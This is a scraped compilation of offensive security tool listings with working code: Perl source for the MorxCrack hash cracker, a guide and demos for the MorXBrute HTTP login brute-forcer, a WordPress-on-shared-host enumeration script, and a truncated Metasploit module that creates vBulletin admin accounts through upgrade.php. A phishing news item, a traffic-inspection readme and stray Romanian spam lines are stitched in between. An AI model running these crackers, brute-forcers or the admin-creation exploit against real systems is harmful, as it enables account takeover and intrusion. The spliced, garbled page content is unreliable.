Fi8sVrs

Description: MorxCrack is a cracking tool written in Perl to perform a dictionary-based attack on various hashing algorithm and CMS salted-passwords. As of version 1.1 MorxCrack supports the following algorithms: MD5 MD5 (Twice) MD5 (PasswordSalt) MD5 (SaltPassword) SHA1 SHA1 (Twice) SHA1 (PasswordSalt) SHA1 (SaltPassword) SHA2 (256 Bits) SHA2 (512 Bits) MySQL (4.1+) Crypt UNIX (Shadow) And the following CMS: Joomla Wordpress (PHPass) VBulletin InvisionPowerBoard Author: Simo Ben youssef <Simo_at_morxploit_dot_com> MorXploit Research Version: MorXCrack V1.1 Beta MD5: 14d0295d3c9b7fd96f5ff2e8b9ca43a8 Release date: April 08 2013 Download: #!/usr/bin/perl -w # # Tool: MorxCrack v1.1 # Author: Simo Ben youssef # Contact: simo_at_morxploit_dot_com # Release date: 24 March 2013 # MorXploit Research # http://www.morxploit.com # # Download: # http://www.morxploit.com/morxcrack # # v1.1 Changes: # Added crack stats. # # Description: # Tool written in perl to perform a dictionary-based attack on various hashing algorithm and CMS salted-passwords. # # Currently supports the following algorithms: # MD5 # MD5 (twice) # SHA1 # SHA2 (256/512) # MySQL (4.1+) # Crypt UNIX (Shadow) # # Currently supports the following CMS: # Joomla # Wordpress (PHPass) # VBulletin # InvisionPowerBoard # # Usage: # perl morxcrack.pl <algorithm> <hash> <wordlist> <salt> # perl morxcrack.pl sha hash wordlist # perl morxcrack.pl crypt 'hash' wordlist # perl morxcrack.pl wordpress 'hash' wordlist # perl morxcrack.pl mysql hash wordlist # perl morxcrack.pl md5twice hash wordlist # # For CMS hashes, a salt is required. # # Usage: # perl morxcrack.pl joomla hash wordlist salt # perl morxcrack.pl vb hash wordlist salt # perl morxcrack.pl ipb hash wordlist salt # # Except for wordpress # perl morxcrack.pl wordpress 'hash' wordlist # # Important note: # Shadow file and Wordpress hashes need to be put between single quotes to avoid shell interpretation of $ character # # Modules: # Requires SHA, MD5 and PHPass modules. # # Install if missing: # perl -MCPAN -e 'install Authen::Passphrase::PHPass' # perl -MCPAN -e 'install Digest::SHA' # perl -MCPAN -e 'install Digest::MD5' # # Test on a Pentium® Dual-Core CPU T4500 @ 2.30GHz * 2 processor using md5 and a 3917096 wordlist: # # perl morxcrack.pl md5 83583d2b5ea4078b9b83f82254e5d564 all.txt # # [*] Hashed password set to 83583d2b5ea4078b9b83f82254e5d564 # [*] Algorithm/CMS set to md5 # [*] Wordlist set to all.txt # # [+] Cracking ... # ############################################################ # [+] Your password is morxploit # [+] found at line 3917096 # [+] Job took 16 seconds ############################################################ # # # Author discolaimer: # This code and all information contained in this entire document is for educational and demonstration purposes only. # Modification, use and publishing this information is entirely on your own risk. # I cannot be held responsible for any malicious use. Use at your own risk. use strict; use Digest::SHA; use Digest::MD5; use Authen::Passphrase::PHPass; system ('clear'); if(!defined ($ARGV[0]&& $ARGV[1]&& $ARGV[2])) { usage(); } sub usage{ print "\n--- MorxCrack Multi-Algorithm/CMS password cracking tool\n"; print "--- By Simo Ben youssef\n"; print "--- www.morxploit.com\n\n"; print "[-] An algorithm, a hash and a wordlist are required\n\n"; print "Usage: perl $0 <algorithm> <hash> <wordlist> <salt>\n\n"; print "Example:\n"; print "perl $0 sha hash wordlist\n"; print "perl $0 sha256 hash wordlist\n"; print "perl $0 sha512 hash wordlist\n"; print "perl $0 md5 hash wordlist\n"; print "perl $0 mysql hash wordlist\n"; print "perl $0 crypt 'hash' wordlist\n"; print "perl $0 wordpress 'hash' wordlist\n"; print "perl $0 md5twice hash wordlist\n"; print "\nFor CMS salt-hashed passwords:\n"; print "perl $0 joomla hash wordlist salt\n"; print "perl $0 vb hash wordlist salt\n"; print "perl $0 wordpress 'hash' wordlist\n"; print "perl $0 ipb hash wordlist salt\n\n"; exit; } sub saltusage{ print "\n--- MorxCrack Multi-Algorithm/CMS password cracking tool\n"; print "--- By Simo Ben youssef\n"; print "--- www.morxploit.com\n\n"; print "[-] You need to specifiy a salt\n\n"; print "Usage: perl $0 <algorithm> <hash> <wordlist> <salt>\n"; print "perl $0 joomla hash wordlist salt\n"; print "perl $0 vb hash wordlist salt\n"; print "perl $0 ipb hash wordlist salt\n\n"; exit; } my $algo = $ARGV[0]; my $hash = $ARGV[1]; my $wordlist = $ARGV[2]; my $salt = $ARGV[3]; my $algoname = $algo; my $subalgo = \&$algoname; my $password; my $digest; my $timestart; $SIG{'INT'} = \&sigIntHandler; $SIG{TSTP} = \&sigTSTPHandler; if (grep { $algo eq $_ && $salt eq ""} qw{joomla vb ibp}) { saltusage(); } elsif (!grep { $algo eq $_} qw{md5 mysql crypt sha sha256 sha512 joomla md5twice wordpress vb ibp}) { usage(); } else { &crack(); } sub crack{ system ('clear'); open (LIST, $wordlist) || die "\n[-] Can't find/open $wordlist\n"; print "\n[*] Hashed password set to $hash\n"; print "[*] Algorithm/CMS set to $algo\n"; print "[*] Wordlist set to $wordlist\n"; print "[*] Control+c to check stats\n"; print "[*] Control+z to exit the program\n\n"; sleep(2); print "[+] Cracking ...\n\n"; $timestart = time(); while ($password = <LIST>) { chomp ($password); &$subalgo(); if ($digest eq $hash) { my $timeend = time(); my $runtime = $timeend - $timestart; print "############################################################\n"; print "[+] Your password is $password\n"; print "[+] Found at line $. of $wordlist\n"; print "[+] Cracked in $runtime seconds\n"; print "############################################################\n\n"; close(LIST); exit; } } my $timeend = time(); my $runtime = $timeend - $timestart; print "############################################################\n"; print "[-] Failed: Couldn't crack the password!\n"; print "[+] Processed $. passwords in $runtime seconds\n"; print "############################################################\n\n"; exit; } sub sha{ use Digest::SHA; my $sha = Digest::SHA->new; $sha->add($password); $digest = $sha->hexdigest; } sub sha256{ my $sha = Digest::SHA->new(256); $sha->add($password); $digest = $sha->hexdigest; } sub sha512{ my $sha = Digest::SHA->new(512); $sha->add($password); $digest = $sha->hexdigest; } sub mysql{ # round 1 hashing my $sha1 = Digest::SHA1->new; $sha1->add($password); my $digest1 = $sha1->digest; # round 2 hashing my $sha1_2 = Digest::SHA1->new; $sha1_2->add($digest1); $digest = $sha1_2->hexdigest; } sub crypt{ $digest = crypt($password, $hash); } sub md5{ my $md5 = Digest::MD5->new; $md5->add($password); $digest = $md5->hexdigest; } sub joomla{ my $key = $password.$salt; my $md5 = Digest::MD5->new; $md5->add($key); $digest = $md5->hexdigest; } sub md5twice{ #round 1 my $md5 = Digest::MD5->new; $md5->add($password); my $digest1 = $md5->hexdigest; #round 2 my $md52 = Digest::MD5->new; $md52->add($digest1); $digest = $md52->hexdigest; } sub vb { # round 1 my $md5 = Digest::MD5->new; $md5->add($password); my $digest1 = $md5->hexdigest; # round 2 my $key = $digest1.$salt; my $md52 = Digest::MD5->new; $md5->add($key); $digest = $md5->hexdigest; } sub ibp { #round 1 my $md5 = Digest::MD5->new; $md5->add($password); my $digest1 = $md5->hexdigest; #round 2 my $md52 = Digest::MD5->new; $md52->add($salt); my $digest2 = $md52->hexdigest; my $key = $digest2.$digest1; # round 3 my $final = Digest::MD5->new; $final->add($key); $digest = $md5->hexdigest; } sub wordpress{ my ($h, $wpsalt, $hash2)=$hash=~m/^(.{4})(.{8})(.+)/; my $ppr = Authen::Passphrase::PHPass->new( cost => 11, salt => "$wpsalt", passphrase => "$password"); my $userpassword = $ppr->as_rfc2307; $digest = substr ($userpassword, 7); } sub sigIntHandler { my $sigtime = time(); my $cctime = $sigtime - $timestart; my $speed = $. / $cctime; print "\n############################################################\n"; print "[*] Current pwd: $password\n"; print "[*] Line number: $.\n"; print "[*] Time elapsed: $cctime\n"; print "[*] Speed: $speed pwd per second\n"; print "############################################################\n"; print "\n[+] Cracking ...\n"; } sub sigTSTPHandler { print "\n############################################################\n"; print "[+] Exiting at line $.\n"; print "[+] Aurevoir!\n"; print "############################################################\n\n"; sleep(2); close(LIST); exit; } Requirements: Perl 5 or older Additional modules: Authen::Passphrase::PHPass Usage: Usage for non-salted passwords: perl morxcrack.pl <algorithm> <’hash’> <wordlist> perl morxploit md5 ’83583d2b5ea4078b9b83f82254e5d564? wordlist.txt Usage for salted passwords: perl morxcrack.pl <algorithm> <’hash’> <wordlist> <salt> perl morxploit.pl joomla ‘a87248e5fc69972804f5bb93c873ee9d’ wordlist.txt 9W11uZafPxbe9xpL Demo: Test on a Pentium® Dual-Core CPU T4500 @ 2.30GHz * 2 processor using md5 and a 3917096 wordlist (43.4 MB): perl morxcrack.pl md5 ’83583d2b5ea4078b9b83f82254e5d564? all.txt [*] Hashed password set to 83583d2b5ea4078b9b83f82254e5d564 [*] Algorithm/CMS set to md5 [*] Wordlist set to all.txt [+] Cracking … ############################################################ # [+] Your password is morxploit # [+] found at line 3917096 # [+] Job took 16 seconds ############################################################ TODO: Get rid of PHPass module Support for more CMS Contribute: Your contribution is needed! Please submit your CMS password hashing methods to simo_at_morxploit_com Make sure to include software details such as name and version number. Also please feel free to submit all your suggestions and bugs. Thanks. Source: MorXCrack Multi-Algorithm/CMS password cracking tool | MorXploit Research

Description: MorXBrute is a customizable HTTP dictionary-based password cracking tool written in Perl. MorXBrute comes with a few payloads for some of the most popular softwares and additionally let you add your own payload for your favorite HTTP software or website. MorXBrute supports both GET and POST brute forcing. MorXBrute was written for educational, demonstration and testing purposes only. Author cannot be held responsible for any malicious use or damage. You can redistribute it and/or modify it under the same terms as Perl itself. Author: Simo Ben youssef <Simo_at_morxploit_dot_com> MorXploit Research Version: MorXBrute v1.01 Beta MD5: b4ea3c6895b9996b72309cc91a5910f8 Release date: November 08 2013 Download: Link 1 Link 2 Requirements: Perl 5 or older Additional modules: None Usage: perl MorXBrute.pl <target:port> <user> <wordlist> <payload file> perl MorXBrute.pl localhost:80 admin password.lst payloads/wordpressv3.7.1 perl MorXBrute.pl update Payloads: As of version 1.01 MorXBrute includes payloads for: Bitrix cPanel everyone email platform Horde Moodle Wordpress Xoops Zimbra However the goal of MorXBrute is to be a customizable HTTP brute forcing tool by giving you the ability to create your own payloads and share them with others, please read below and feel free to contact me if you need help. How to generate Payloads: Generating your own payload for your target requires a little work, right now MorXBrute can’t do that for you, but I’m considering to add a payload generator in the future. MorXBrute works by sending either a POST or GET request to the target with the login and pass and any other data as required by the target script, MorXBrute proceeds then to read the server’s response for each request. The server’s response changes just as login parameters, but in most cases, after successful authentication, the server responds with a HTTP/1.1 302 Found and redirects the browser to a new location. In this case MorXBrute uses the regex Location: (.*) to distinguish between a successful and a failed login attempt. In some other cases, some scripts like joomla will assign a cookie and redirects you to the administration page either way, before the script validates login cookie. This makes brute forcing slower and is not supported by MorXBrute. First you will need a network sniffer or if you use Google Chrome you can use the built-in network sniffer in the Developer tools (CTRL + Shift + i). Personally I prefer to use ngrep which can be downloaded from: ngrep - network grep or apt-get install ngrep on Debian/Ubuntu and yum install ngrep on Red Hat/Fedora/Centos You can then run it to capture your target traffic to analyze by running: ngrep -q -d interface -W byline host target and port 80 > target.log ngrep -q -d wlan0 -W byline host mywordpresssite.com and port 80 > wordpress.log At the login page, send two requests, one with valid login credentiels and second with false login credentiels. Once done go back and check your ngrep logs and gather the following (in wordpress example). login script path: POST /wp-login.php Or when GET is used (not in wordpress case) GET /someotherscript.php posted data log=admin&pwd=somelamepassword&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.testserver%2Fwp-admin%2F&testcookie=1 or log=admin&pwd=somelamepassword when GET is used (again not in word press case) GET /someotherscript.php?log=admin&pwd=somelamepassword on the successful login attempt log check the rest of the response headers to see if the server responded with a new location Example: Set-Cookie: wordpress_logged_in_b376718910d75b03e67817ec5d3badc4=admin%7C1563339904%7Cba04510cfb75c0a5094246a6f150baee; path=/; httponly. Location: http://testserver/wp-admin/ <——– HERE Content-Length: 0 Connection: close On the failed login attempt log check also for the location response. If you can’t find the location response in the failed login log then bingo that’s the server telling you that your password works, and that’s our key! Otherwise and if the server responds with the same location either way then it’s probably trying to validate the newly assigned cookie on the next step. In some rare cases, some scripts use the main restricted area (admin panel/mailbox etc) script to process login requests in this case you can easily find the regex key by looking either at the cookie value (BITRIX_SM_LOGIN=admin in Bitrix case) or anything different in the HTML code, a welcome message (Welcome user to inbox as an example) and add it in the payload as Welcome(.*?)to Payload file structure: The structure is very simple, there are 4 values seperated by comma “,” 1- POST: HTTP method (could be either POST or GET) 2- login.php: the login script path Note: this is the full path, if your script is installed in a subdirectory then you should include that too for example if your wordpress is installed in http://localhost/wordpress then you should include it in the payload (POST:wordpress/wp-login.php) 3- login parameters (login and password) Note: $user and $pwd are used by MorXBrute and should not be changed 4- MorXploit: Cookie value, change if required by the remote login 5- Regex key POST,login.php,login=$user&password=$pwd,MorXploit,Location:(.*) Note: Although wordpress takes other data paremeters besides log and pwd such as redirect_to and testcookie, it only requires those first two. Demo: POST Method: root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl demo.opensourcecms.com:80 admin word.lst payloads/wordpressv3.7.1 =================================================== — MorXBrute v1.0 Beta HTTP password cracking tool — By Simo Ben youssef — www.morxploit.com =================================================== [*] target set to demo.opensourcecms.com:80 [*] user set to admin [*] Wordlist set to word.lst [*] payload set to payloads/wordpressv3.7.1 [+] Cracking … [-] test -> Failed [-] test123 -> Failed [-] testtest -> Failed [-] testest123 -> Failed [-] qwerty -> Failed [-] azerty -> Failed [-] password -> Failed [-] password123 -> Failed [-] x3demob -> Failed ============================================================ [+] CRACKED! Your password is demo123 [+] Found at line 10 of word.lst [+] Cracked in 6 seconds ============================================================ GET Method: root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl x3demob.cpx3demo.com:2082 x3demob word.lst payloads/cpanelgetprov1.0 =================================================== — MorXBrute v1.0 Beta HTTP password cracking tool — By Simo Ben youssef — www.morxploit.com =================================================== [*] target set to x3demob.cpx3demo.com:2082 [*] user set to x3demob [*] Wordlist set to word.lst [*] payload set to payloads/cpanelgetprov1.0 [+] Cracking … [-] test -> Failed [-] test123 -> Failed [-] testtest -> Failed [-] testest123 -> Failed [-] qwerty -> Failed [-] azerty -> Failed [-] password -> Failed [-] password123 -> Failed ============================================================ [+] CRACKED! Your password is x3demob [+] Found at line 9 of word.lst [+] Cracked in 4 seconds ============================================================ TODO: Add SSL suport Add a payload generator And maybe more? Submit your payloads: Your contribution is needed! Please submit your payloads to simo_at_morxploit_com Make sure to include software/service details such as name, URL and version number Also please feel free to submit all your suggestions and bugs. Thanks and happy MorXBruteForcing! Source: MorXBrute HTTP Password cracking tool

up . sau transfer bancar

down //closed

hwk is an easy-to-use wireless authentication and de-authentication tool. Furthermore, it also supports probe response fuzzing, beacon injection flooding, antenna alignment and various injection testing modes. Information gathering is selected by default and shows the incoming traffic indicating the packet types. /******************************************************************************* * ____ _ __ * * ___ __ __/ / /__ ___ ______ ______(_) /___ __ * * / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / * * /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / * * /___/ team * * * * README * * * * DATE * * 8/03/2013 * * * * AUTHOR * * atzeton - http://www.nullsecurity.net/ * * * * LICENSE * * GNU GPLv2, see COPYING * * * ******************************************************************************/ What is hwk? =============== hwk is a collection of packet crafting/network flooding tools: - hawk for flooding the air with preconfigured or non-interactivly gained information - eagle for RADIOTAP WLAN MGT and LLC header packet crafting. It also supports appending random 'payload' WARNING: This is an BETA release since it hasn't been tested sufficiently. Dependencies: ============= - libpcap How to install? =============== make (as root) make install make clean INFO: CAP_NET_RAW, CAP_NET_ADMIN, CAP_SYS_ADMIN (ioctls) capabilities are automatically set during installation. Usage ===== See --help or the man files of hawk/eagle or man files! Bugs ===== If you find any bugs, feel free to drop me a line! Stay tuned ========== * http://nullsecurity.net/ Download HWK Wireless Auditing Tool 0.4 ? Packet Storm

AIEngine is a packet inspection engine with capabilities of learning without any human intervention. AIEngine helps network/security profesionals to identify traffic and develop signatures for use them on NIDS, Firewalls, Traffic classifiers and so on. Using AIEngine To use AIEngine just execute the binary aiengine: luis@luis-xps:~/c++/aiengine/src$ ./aiengine -h iaengine 0.1 Mandatory arguments: -I [ --interface ] arg Sets the network interface. -P [ --pcapfile ] arg Sets the pcap file. Link Layer optional arguments: -q [ --tag ] arg Selects the tag type of the ethernet layer (vlan,mpls). TCP optional arguments: -t [ --tcp-flows ] arg (=32768) Sets the number of TCP flows on the pool. UDP optional arguments: -u [ --udp-flows ] arg (=16384) Sets the number of UDP flows on the pool. Signature optional arguments: -R [ --enable-signatures ] Enables the Signature engine. -r [ --regex ] arg (=.*) Sets the regex for evaluate agains the flows. -c [ --flow-class ] arg (=all) Uses tcp, udp or all for matches the signature on the flows. Frequencies optional arguments: -F [ --enable-frequencies ] Enables the Frequency engine. -g [ --group-by ] arg (=dst-port) Groups frequencies by src-ip,dst-ip,src-por t and dst-port. -f [ --flow-type ] arg (=tcp) Uses tcp or udp flows. -L [ --enable-learner ] Enables the Learner engine. -k [ --key-learner ] arg (=80) Sets the key for the Learner engine. Optional arguments: -k [ --stack ] arg (=lan) Sets the network stack (lan,mobile). -d [ --dumpflows ] Dump the flows to stdout. -s [ --statistics ] arg (=0) Show statistics of the network stack. -p [ --pstatistics ] Show statistics of the process. -h [ --help ] Show help. -v [ --version ] Show version string. Integrating AIEngine with other systems AIEngine have a python module in order to be more flexible in terms of integration with other systems and functionalities. The main objects that the python module provide are the followin. Check the wiki pages in order to have more examples. Flow |---> getDestinationAddress |---> getDestinationPort |---> getFrequencies |---> getHTTPHost |---> getHTTPUserAgent |---> getPacketFrequencies |---> getProtocol |---> getSourceAddress |---> getSourcePort |---> getTotalBytes |---> getTotalPackets |---> getTotalPacketsLayer7 FlowManager Frequencies |---> getDispersion |---> getEnthropy |---> getFrequenciesString HTTPHost HTTPUserAgent LearnerEngine |---> agregateFlows |---> compute |---> getRegularExpression |---> getTotalFlowsProcess NetworkStack |---> enableFrequencyEngine |---> enableLinkLayerTagging |---> getTCPFlowManager |---> getUDPFlowManager |---> printFlows |---> setStatisticsLevel |---> setTCPSignatureManager |---> setTotalTCPFlows |---> setTotalUDPFlows |---> setUDPSignatureManager PacketDispatcher |---> closeDevice |---> closePcapFile |---> openDevice |---> openPcapFile |---> run |---> runPcap |---> setStack PacketFrequencies |---> getPacketFrequenciesString Signature |---> getExpression |---> getMatchs |---> getName SignatureManager |---> addSignature StackLan |---> enableFrequencyEngine |---> enableLinkLayerTagging |---> getTCPFlowManager |---> getUDPFlowManager |---> printFlows |---> setStatisticsLevel |---> setTCPSignatureManager |---> setTotalTCPFlows |---> setTotalUDPFlows |---> setUDPSignatureManager StackMobile |---> enableFrequencyEngine |---> enableLinkLayerTagging |---> getTCPFlowManager |---> getUDPFlowManager |---> printFlows |---> setStatisticsLevel |---> setTCPSignatureManager |---> setTotalTCPFlows |---> setTotalUDPFlows |---> setUDPSignatureManager Compile AIEngine $ git clone git://bitbucket.com/camp0/aiengine $ ./autogen.sh $ ./configure $ make Contributing to AIEngine AIEngine is under the terms of GPLv2 and is under develop. Check out the AIEngine source with $ git clone git://bitbucket.com/camp0/aiengine https://bitbucket.org/camp0/aiengine/

Cumpar 100 usd perfect money platesc credit sms orange

Description Originally designed as a word list creation tool, thad0ctor's BT5 Toolkit has become an all purpose security script to help simplify many Backtrack 5 functions to help Pentesters strengthen their systems. The backbone of thad0ctor's Backtrack 5 Toolkit is the Wordlist Toolkit that contains a plethora of tools to create, modify, and manipulate word lists in order for end users to strengthen their systems by testing their passwords against a variety of tools designed to expose their pass phrases. In short it is the ultimate tool for those looking to make a wide variety of word lists for dictionary based and other brute force attacks. The toolkit is designed with usability in mind for the Backtrack 5R2 linux distro but will also work on BT5 R1 and other Ubuntu based distros if configured properly. The script is constantly updated with multiple revisions to include new cutting edge features and improvements in order to provide full spectrum wordlist creation capabilities. Features Create word lists for SSNs, Phone Numbers, Date Ranges, Random Patterns, Password Policies, Patterns, from PDF/EBOOK files, for Default Router Passwords, or by profiling targets Manipulate word lists by changing character cases, mirroring or doubling up words, reversing words prefixing or appending sequences of numbers or characters, inserting text, removing patterns or characters, converting words to 1337 speak, mangling words with John the Ripper and more Optimize word lists by converting them to ASCII, trimming the words to set minimum and maximum lengths, sorting and removing duplicates, removing non-printable characters, splitting word lists into more manageable chunks and more Analyzes word lists by viewing their line count, a break down of their most common patterns and characters used, search word lists for a certain string or sub-string, and calculate the time it would take to process a word list through a aircrack-ng or pyrit based dictionary attack Combine individual word lists or word lists of a directory into a single word list and gather word lists system wide into one directory Fully customize the usage of the script to streamline functionality. Change console output text color, configure passthough attack options for certain attacks, toggle or force on or off the GTK and CLI versions of the script, toggle whether or not to display the start up banner, toggle the main menu style and customize the script 1337ify options. Stay up to date with a fully integrated and fool proof update system that pulls directly from the script's Sourceforge for up to the minute updates and configure whether or not you would like to auto-update the script on start up. Make sure everything is working properly and dependencies are met with an automated dependency check and install system that takes all the pain and guesswork out of dependency issues. Download | Backtrack 5 toolkit Web Site >

Description JBrute is an open source tool written in Java to audit security and stronghold of stored password for several open source and commercial apps. It is focused to provide multi-platform support and flexible parameters to cover most of the possible password-auditing scenarios. Java Runtime version 1.7 or higher is required for running JBrute. Supported algorithms: MD5 MD4 SHA-256 SHA-512 MD5CRYPT SHA1 ORACLE-10G ORACLE-11G NTLM LM MSSQL-2000 MSSQL-2005 MSSQL-2012 MYSQL-322 MYSQL-411 POSTGRESQL SYBASE-ASE1502 To see syntax examples: https://sourceforge.net/p/jbrute/wiki/Examples To see last news: https://sourceforge.net/p/jbrute/blog FAQ: https://sourceforge.net/p/jbrute/wiki/FAQ/ General questions: jbrute-users@lists.sourceforge.net (you can suscribe to mailing list at https://lists.sourceforge.net/lists/listinfo/jbrute-users) Author: Gonzalo L. Camino Icon Art: Ivan Zubillaga Made in: Argentina Features Muli-platform support (by Java VM) Several hashing algorithms supported Flexible chained hashes decryption (like MD5(SHA1(MD5()))) Both brute force and dictionary decryption methods supported Build-In rule pre-processor for dictionary decryption Multi-threading support for brute force decryption Download | JBrute Web Site >

This program find wordpress domains which is hosted on the same server #!/bin/bash # # --------------------------------- # Server Wordpress Finder # Licence : Linux # --------------------------------- # # Title : Server Wordpress Finder # Code : Bash # Author : RedH4t.Viper # Email : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com # Released : 2013 18 June # Home : IrIsT Security Center # Thanks : IrIsT ,TBH ,kurdhackteam , 3xp1r3 , thecrowscrew # # Gr33tz : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Skote_Vahshat | # Gr33tz : Net.W0lf | Dj.TiniVini| Mr.XHat | Black King | Devil | # Gr33tz : E2MAEN | () | M4st3r4N0nY |Turk Sever | dr.koderz | V30sharp # Gr33tz : ARTA | Mr.Zer0 | Sajjad13and11 | Silent | Smartprogrammer | # Gr33tz : x3o-1337 | rEd X | No PM | Gabby | Sukhoi Su-37 | IR Anonymous | # Gr33tz : Megatron | Zer0 | sole sad | Medrik | F@rid | And All Of IrIsT Memebrz | #------------------------------------------------------------------------------------------# page=0 how_many=1 IP_SERVER=$1 single_page= last_page_check= banner() { echo " _ _______ ______ _ _ " echo " | | | | ___ \ | ___(_) | | " echo " | | | | |_/ / | |_ _ _ __ __| | ___ _ __ " echo " | |/\| | __/ | _| | | '_ \ / _\ |/ _ \ '__| " echo " \ /\ / | | | | | | | | (_| | __/ | " echo " \/ \/\_| \_| |_|_| |_|\__,_|\___|_| " echo " " } Usage() { echo "" echo "# ***************************************************************************??***?*?*********************#" echo "# Usage : Server Wordpress Finder <IP/Domain> *#" echo "# Help : -h && --help : Show This Menu *#" echo "# RunScript : Give Permision to script and run it !! *#" echo "# ***************************************************************************??***?*?*********************#" echo "" } Check_Arguments() { if [ -z "$IP_SERVER" ] || [ "$IP_SERVER" == "-h" ] || [ "$IP_SERVER" == "--help" ]; then Usage; exit fi } Searching_Jce() { rm -rf domains.txt rm -rf alldomain_bing.txt rm -rf IndexDomain.txt if [ `echo "$IP_SERVER" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then IP="$IP_SERVER" else IP=`resolveip -s "$IP_SERVER"` if [ "$?" != 0 ]; then echo -e "[-] Error: cannot resolve $IP_SERVER to an IP " fi fi echo -e "\e[1;35m[*] Finded Wordpress Web Sites Will be Save at finded.txt \e[0m" echo -e "\e[1;35m[*] Searching WP on $IP Plz W8 \e[0m" touch alldomain_bing.txt; while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do url="http://www.bing.com/search?q=ip%3a$IP+%27%2f%E2%80%8Bwp-content%2f%27&qs=n&pq=ip%3a$IP+%27%2f%E2%80%8Bwp-content%2f%27&sc=0-15&sp=-1&sk=&first=${page}1&FORM=PERE" wget -q -O domain_bing.php "$url" last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php` # if no results are found, how_many is empty and the loop will exit how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3` # check for a single page of results single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php ` cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt rm -f domain_bing.php let page=$page+1 done cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt for domain in `cat domains.txt` do echo "$domain" | grep "wp-content" >> /dev/null;check=$? if [ $check -eq 0 ] then echo "$domain" >>IndexDomain.txt fi done #awk '{gsub("wp-content","")}1' | cat IndexDomain.txt | cut -d '/' -f 1 | sort | uniq >> finded.txt found_N=`wc -l finded.txt | sed 's/finded.txt//'` echo -e "\e[1;34m[+] Found $found_N \e[0m" for wp in `cat finded.txt` do echo -e "\e[1;32m[*] $wp \e[0m" done rm -rf domains.txt rm -rf alldomain_bing.txt rm -rf IndexDomain.txt } main() { banner ; Check_Arguments; Searching_Jce; } main;

Symantec researchers have recently stumbled upon a phishing site that packs a double whammy: the site asks the user either to log into Facebook or to download an app in order to activate a bogus service that will supposedly let them know who visited their Facebook profile (click on the screenshot to enlarge it): For those who opt for the first option and enter their Facebook login credentials the news is bad: their username and password has been sent to the phishers, and will likely be used to hijack the victims' account. For those who chose the latter option, the news could be even worse. The file (WhoViewedMyfacebookProfile.rar) offered for download contains an information-stealing Trojan, which can potentially gather all kinds of confidential information from the victims' computer - including personal, financial and login information for different online services - and is set to send them to the attacker’s email address. But, as the researchers noted, that email address has not been valid for 3 month, so the information gets sent and lost into a virtual black hole of the Internet. Nevertheless, the malware can get updated at any moment, and the email address in question changed to a valid one. "If users fell victim to the phishing site by entering their login credentials, the phishers would have successfully stolen their information for identity theft purposes," note the researchers. The phished credentials are, then, obviously sent to servers controlled by the attackers, and not to the aforementioned email address. But whether this phishing scam is stil active or not is not the point, because other similar ones are popping up daily. The good thing to remember is to be careful about where you are entering your account credentials (always check if the URL is the right one, and don't follow links from unsolicited emails) and what software you download (don't accept software you haven't asked for, and be careful when searching for software online - keep to established download sites). Via Bogus Facebook login page steals credentials, pushes malware

This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. Module Name auxiliary/admin/http/vbulletin_upgrade_admin Authors Unknown juan vazquez <juan.vazquez [at] metasploit.com> References URL: https://rstforums.com/forum/76476-dangerous-vbulletin-exploit-wild.rst URL: Dangerous vBulletin exploit in the wild URL: Potential vBulletin Exploit (vBulletin 4.1+, vBulletin 5+) - vBulletin Community Forum Module Options To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': msf > use auxiliary/admin/http/vbulletin_upgrade_admin msf auxiliary(vbulletin_upgrade_admin) > show actions ...actions... msf auxiliary(vbulletin_upgrade_admin) > set ACTION <action-name> msf auxiliary(vbulletin_upgrade_admin) > show options ...show and set options... msf auxiliary(vbulletin_upgrade_admin) > run Development Source Code ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin Administrator Account Creation', 'Description' => %q{ This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. }, 'Author' => [ 'Unknown', # Vulnerability discoverer? found in the wild 'juan vazquez' #metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.net-security.org/secworld.php?id=15743' ], [ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5'] ], 'DisclosureDate' => 'Oct 09 2013')) register_options( [ OptString.new('TARGETURI', [ true, "The vbulletin URI", '/']), OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']), OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']), OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc']) ], self.class) end def user datastore["USERNAME"] end def pass datastore["PASSWORD"] end def run if user == pass print_error("#{peer} - Please select a password different than the username") return end print_status("#{peer} - Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), 'method' =>'POST', 'vars_post' => { "version" => "install", "response" => "true", "checktable" => "false", "firstrun" => "false", "step" => "7", "startat" => "0", "only" => "false", "options[skiptemplatemerge]" => "0", "reponse" => "yes", "htmlsubmit" => "1", "htmldata[username]" => user, "htmldata[password]" => pass, 